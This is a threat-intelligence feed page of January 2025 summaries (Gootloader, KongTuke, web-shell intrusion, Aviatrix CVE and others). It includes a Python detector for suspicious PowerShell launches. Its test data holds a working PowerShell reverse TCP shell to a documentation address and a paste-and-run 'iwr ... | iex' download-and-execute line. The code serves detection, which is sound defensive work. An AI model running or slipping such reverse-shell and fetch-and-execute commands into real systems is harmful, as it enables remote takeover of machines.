Securonix Threat Labs

Get up-to-date threat content from the experts at Securonix Threat Labs.

Uncover the threats of tomorrow, today.

Securonix Threat Labs helps your team fend off rising threats by bringing the industry’s brightest minds together to equip you with the latest countermeasures and best practices.


Powered by Threat Labs

Autonomous Threat Sweeper

Acting as your own dedicated Cyber Rapid Response Team, Securonix Autonomous Threat Sweeper (ATS) automatically and retroactively hunts for new and emerging threats based on the latest threat intelligence from our Threat Labs Team.

Latest ATS Entries

All indicators of compromise (IOC) and Spotter queries are available on our GitHub repository.

2025-01-19
SEO_Manipulation_by_Gootloader
LOW
Intel Source:
sophos
Intel Name:
SEO_Manipulation_by_Gootloader
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Sophos have reconstructed the server-side behaviour of Gootloader, an SEO-driven malware loader that lures victims through compromised WordPress sites. Gootloader poisons Google search results to steer users to legitimate sites that have been modified to display fake message-board threads, with malware download links embedded in seemingly relevant replies.
Source: https://news.sophos.com/en-us/2025/01/16/gootloader-inside-out/
2025-01-19
IoT_Botnet_Targets_Global_Networks
LOW
Intel Source:
Trend Micro
Intel Name:
IoT_Botnet_Targets_Global_Networks
Date of Scan:
2025-01-19
Impact:
LOW
Summary:
Researchers at Trend Micro have observed large-scale DDoS attacks launched by an IoT botnet, targeting enterprises primarily in Japan but also in other countries. The botnet, built from malware variants derived from Mirai and Bashlite, compromises IoT devices such as wireless routers and IP cameras by exploiting vulnerabilities and weak passwords. Infected devices communicate with command-and-control servers to launch various DDoS attacks, update the malware, and provide proxy services.
Source: https://www.trendmicro.com/en_us/research/25/a/iot-botnet-linked-to-ddos-attacks.html
2025-01-18
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
MEDIUM
Intel Source:
Arctic Wolf
Intel Name:
FortiGate_Firewalls_Targeted_by_Exploited_Zero_Day
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
Arctic Wolf Labs researchers have observed a campaign targeting Fortinet FortiGate firewalls whose management interfaces are exposed to the public internet. The threat actors gained unauthorized access, created new accounts, modified configurations, and extracted credentials. The initial access vector has not been confirmed, but Arctic Wolf assesses with high confidence that a zero-day vulnerability was involved.
Source: https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/
2025-01-18
Analyzing_a_Web_Shell_Intrusion
LOW
Intel Source:
Trend Micro
Intel Name:
Analyzing_a_Web_Shell_Intrusion
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Trend Micro researchers investigated a customer incident that began with suspicious activity flagged by endpoint sensors. The IIS worker process (w3wp.exe) on a public-facing server had been compromised through an uploaded web shell, whose execution was initially unrestricted. Through it the attacker created a new account and changed an existing user's password, then used an encoded PowerShell command to open a reverse TCP shell for command-and-control communication. Further investigation found multiple payloads downloaded to the system, and the attacker's initial access was traced through the web server requests that interacted with the web shell.
Source: https://www.trendmicro.com/en_us/research/25/a/investigating-a-web-shell-intrusion-with-trend-micro--managed-xd.html
2025-01-18
RansomHub_Affiliate_Uses_Python_Based_Backdoor
MEDIUM
Intel Source:
GuidePoint
Intel Name:
RansomHub_Affiliate_Uses_Python_Based_Backdoor
Date of Scan:
2025-01-18
Impact:
MEDIUM
Summary:
GuidePoint Security researchers have uncovered a Python-based backdoor used by a threat actor to maintain access to compromised devices. Initial access came through fake software-update lures that impersonate legitimate updates to trick users; roughly 20 minutes after the initial infection, the Python backdoor was installed on the compromised device. The attackers then used RDP to move laterally to other systems in the network and deploy additional copies of the backdoor, ultimately using that access to deploy RansomHub ransomware across the network to encrypt data.
Source: https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/
2025-01-18
Nickel_Tapestry_Fraud_Connections
LOW
Intel Source:
Secureworks
Intel Name:
Nickel_Tapestry_Fraud_Connections
Date of Scan:
2025-01-18
Impact:
LOW
Summary:
Researchers at the Secureworks Counter Threat Unit have identified links between North Korean IT worker schemes and a 2016 crowdfunding scam. The schemes, attributed to the NICKEL TAPESTRY threat group, involved front companies including Yanbian Silverstar in China and Volasys Silver Star in Russia, both of which were sanctioned by the U.S. Department of the Treasury in 2018.
Source: https://www.secureworks.com/blog/nickel-tapestry-infrastructure-associated-with-crowdfunding-scheme
2025-01-17
Star_Blizzard_Targets_WhatsApp_Accounts
MEDIUM
Intel Source:
Microsoft
Intel Name:
Star_Blizzard_Targets_WhatsApp_Accounts
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
Microsoft researchers have identified a new tactic used by the Russian threat actor Star Blizzard to target victims through WhatsApp. The group typically targets government officials, diplomats, defense policy researchers, and those supporting Ukraine in the war with Russia. In this campaign, spear-phishing emails impersonating a U.S. government official carry a QR code that purports to let the recipient join a WhatsApp group supporting Ukrainian NGOs. The QR code is deliberately non-functional; when the target replies, the attackers send a follow-up email with a link to a web page that asks the target to scan another QR code. That code is in fact a WhatsApp device-linking code, so scanning it links the victim's WhatsApp account to the attacker's device. The attacker can then read the victim's WhatsApp messages and exfiltrate data using browser plugins.
Source: https://www.microsoft.com/en-us/security/blog/2025/01/16/new-star-blizzard-spear-phishing-campaign-targets-whatsapp-accounts/
2025-01-17
KongTuke_Campaign_Exploits_BOINC
LOW
Intel Source:
PaloAlto
Intel Name:
KongTuke_Campaign_Exploits_BOINC
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
KongTuke is a malicious campaign that uses scripts injected into compromised websites to display fake "verify you are human" pages. These pages trick users into running a malicious PowerShell script by copying it into the clipboard and instructing the user to paste and execute it. The resulting infection abuses BOINC (Berkeley Open Infrastructure for Network Computing), a legitimate distributed-computing platform widely used by research organizations. The attackers set up rogue BOINC project servers on domains such as rosettahome[.]cn and rosettahome[.]top to pass as legitimate Rosetta@home servers; these servers are unrelated to Rosetta@home and serve only the campaign.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-01-13-IOCs-for-Kongtuke-activity.txt
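Both the web-shell intrusion above (w3wp.exe spawning an encoded PowerShell reverse shell) and the KongTuke paste-and-run lure come down to the same hunting question: which process launched PowerShell, and what was it told to run? The following is an example detector added for this page. It is not Trend Micro's, Unit 42's or Securonix's detection content and is not one of the Spotter queries in the GitHub repository. The telemetry records are constructed, simplified Sysmon Event ID 1-style process-creation events with assumed field names (parent_image, image, command_line); the reverse-shell script, the 203.0.113.10 address (TEST-NET-3) and the fake-captcha.example domain are test data, not observed indicators. It goes slightly beyond the summaries by decoding any abbreviation of -EncodedCommand that PowerShell accepts (-e, -ec, -enc, ...), since attackers rarely spell the switch out.

```python
"""Flag suspicious PowerShell launches in process-creation telemetry (example code)."""
import base64
import binascii
import ntpath

# --- constructed sample telemetry (not real incident data) -------------------
# A PowerShell reverse TCP shell of the kind the web-shell write-up describes.
# 203.0.113.10 is a documentation (TEST-NET-3) address.
REVSHELL_SCRIPT = (
    "$c=New-Object System.Net.Sockets.TCPClient('203.0.113.10',4444);"
    "$s=$c.GetStream();[byte[]]$b=0..65535|%{0};"
    "while(($i=$s.Read($b,0,$b.Length)) -ne 0){"
    "$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);"
    "$r=(iex $d 2>&1|Out-String);$sb=[Text.Encoding]::ASCII.GetBytes($r);"
    "$s.Write($sb,0,$sb.Length)}"
)
# -EncodedCommand takes the base64 of the script's UTF-16LE bytes.
ENC_REVSHELL = base64.b64encode(REVSHELL_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # IIS worker spawning an encoded PowerShell reverse shell (web-shell case)
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENC_REVSHELL}"},
    # Win+R paste-and-run from a fake CAPTCHA page (ClickFix/KongTuke case);
    # fake-captcha.example is a hypothetical domain
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr http://fake-captcha.example/run.ps1 | iex"'},
    # benign: an admin running a script from the desktop
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    # benign: IIS worker spawning conhost, which is normal noise
    {"parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\conhost.exe",
     "command_line": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_CMDLETS = ("iwr", "irm", "invoke-webrequest", "invoke-restmethod",
                    "downloadstring", "downloadfile", "start-bitstransfer", "curl", "wget")


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _param_prefix(token: str, name: str) -> bool:
    """True if token abbreviates the PowerShell switch -name (e.g. -enc for -EncodedCommand)."""
    if not token.startswith(("-", "/")):
        return False
    t = token.lstrip("-/").lower()
    return bool(t) and name.startswith(t)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries -EncodedCommand in any abbreviation, else None."""
    toks = cmdline.split()
    for tok, nxt in zip(toks, toks[1:]):
        if _param_prefix(tok, "encodedcommand"):
            try:
                return base64.b64decode(nxt.strip("\"'"), validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None  # -e/-enc present but payload is not valid base64/UTF-16LE
    return None


def has_hidden_window(cmdline: str) -> bool:
    toks = cmdline.lower().split()
    return any(_param_prefix(t, "windowstyle") and n == "hidden" for t, n in zip(toks, toks[1:]))


def analyze_event(ev: dict) -> list:
    """Return the names of the rules that fire for one process-creation event."""
    parent, image, cmd = _basename(ev["parent_image"]), _basename(ev["image"]), ev["command_line"]
    hits = []
    if parent == "w3wp.exe" and image in SHELLS:
        hits.append("iis_worker_spawned_shell")  # web server process should not run shells
    script = decode_encoded_command(cmd)
    if script is not None:
        hits.append("encoded_command")
        low = script.lower()
        if "system.net.sockets.tcpclient" in low and (".getstream(" in low or "iex" in low):
            hits.append("encoded_reverse_tcp_shell")
    if (parent == "explorer.exe" and image in {"powershell.exe", "pwsh.exe"}
            and has_hidden_window(cmd) and any(c in cmd.lower() for c in DOWNLOAD_CMDLETS)):
        hits.append("clickfix_paste_and_run")  # user-launched, hidden, downloads and runs code
    return hits


def sweep(events: list) -> list:
    """Retroactively scan a batch of events; returns (index, rules) for each event that fired."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := analyze_event(ev))]


if __name__ == "__main__":
    for idx, rules in sweep(SAMPLE_EVENTS):
        print(idx, rules)
        if (s := decode_encoded_command(SAMPLE_EVENTS[idx]["command_line"])):
            print("   decoded:", s[:80], "...")
```

Two design points: the rules key on parent/child relationships rather than on file hashes or domains, so they survive the attacker changing infrastructure, and the decoder is applied before string matching, because the reverse-shell indicators only exist in the decoded UTF-16LE script, never in the raw command line. Tune the explorer.exe rule to your environment; on hosts where users legitimately run one-liners that download content it will need an allow-list.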
2025-01-17
Exploitation_of_Aviatrix_Controller_Vulnerability
MEDIUM
Intel Source:
WIZ
Intel Name:
Exploitation_of_Aviatrix_Controller_Vulnerability
Date of Scan:
2025-01-17
Impact:
MEDIUM
Summary:
CVE-2024-50603 is a critical vulnerability in the Aviatrix Controller that allows unauthenticated attackers to execute commands on the system remotely. The flaw is an OS command injection: the controller's API fails to properly neutralize user-supplied input. The impact is most severe when the Aviatrix Controller is deployed in AWS, where the controller's permissions can also give attackers high-privilege access to the cloud environment. Wiz researchers have observed attackers exploiting the flaw in the wild to mine cryptocurrency and install backdoors.
Source: https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603
2025-01-17
Deep_Dive_Into_a_Linux_Rootkit_Malware
LOW
Intel Source:
Fortinet
Intel Name:
Deep_Dive_Into_a_Linux_Rootkit_Malware
Date of Scan:
2025-01-17
Impact:
LOW
Summary:
Fortinet researchers have analyzed a rootkit that infects Linux systems and is deployed via a zero-day exploit. The malware has two components, a kernel module and a user-space program. The kernel module creates a hidden communication channel through a Linux system file and hijacks network traffic; it establishes a secure session and processes encrypted commands, enabling the attacker to restart processes or execute system commands with root privileges. The user-space program pretends to be a normal process while secretly running the attacker's commands in the background in coordination with the kernel module.
Source: https://www.fortinet.com/blog/threat-research/deep-dive-into-a-linux-rootkit-malware

Threat Content

Shared Security Content on Sigma

Securonix Threat Labs publishes up-to-date IOCs and threat hunting queries on Sigma, allowing you to tap into a vast community of collective defense and stay ahead of emerging threat research.


Why Security Content Matters

Learn how Securonix is paving the way to make precise, and actionable security content a reality for our customers.